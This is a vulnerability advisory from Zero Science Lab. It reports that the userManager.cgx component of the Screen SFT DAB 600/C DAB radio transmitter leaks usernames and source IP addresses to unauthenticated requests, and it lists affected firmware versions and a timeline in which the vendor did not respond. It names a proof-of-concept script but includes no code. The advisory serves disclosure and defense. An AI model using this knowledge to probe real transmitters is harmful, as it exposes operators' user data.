Title: Screen SFT DAB 600/C Unauthenticated Information Disclosure (userManager.cgx)
Advisory ID: ZSL-2023-5776
Type: Local/Remote
Impact: Spoofing, Exposure of System Information, Exposure of Sensitive Information
Risk: (3/5)
Release Date: 13.05.2023
Summary
Screen\’s new radio DAB Transmitter is reaching the highesttechnology level in both Digital Signal Processing and RF domain.SFT DAB Series – Compact Radio DAB Transmitter – Air. Thanks to thedigital adaptive precorrection and configuatio flexibility, the HotSwap System technology, the compactness and the smart system design,the SFT DAB are advanced transmitters. They support standards DAB,DAB+ and T-DMB and are compatible with major headend brands.
Description
Screen is affected by an information disclosure vulnerabilitydue to improper access control enforcement. An unauthenticated remoteattacker can exploit this, via a specially crafted request to gainaccess to sensitive information including usernames and source IPaddresses.
Vendor
DB Elettronica Telecomunicazioni SpA – https://www.screen.it | https://www.dbbroadcast.com
Affected Version
Firmware: 1.9.3
Bios firmware: 7.1 (Apr 19 2021)
Gui: 2.46
FPGA: 169.55
uc: 6.15
Tested On
Keil-EWEB/2.1
MontaVista® Linux® Carrier Grade eXpress (CGX)
Vendor Status
[19.03.2023] Vulnerability discovered.
[20.03.2023] Vendor contacted.
[12.05.2023] No response from the vendor.
[13.05.2023] Public security advisory released.
PoC
screen_info.py
Credits
Vulnerability discovered by Gjoko Krstic – <gjoko@zeroscience.mk>
References
N/A
Changelog
[13.05.2023] – Initial release
Contact
Zero Science Lab
Web: https://www.zeroscience.mk
e-mail: lab@zeroscience.mk
Source: php.6775-3202-LSZ/seitilibarenluv/ne/km.ecneicsorez.www
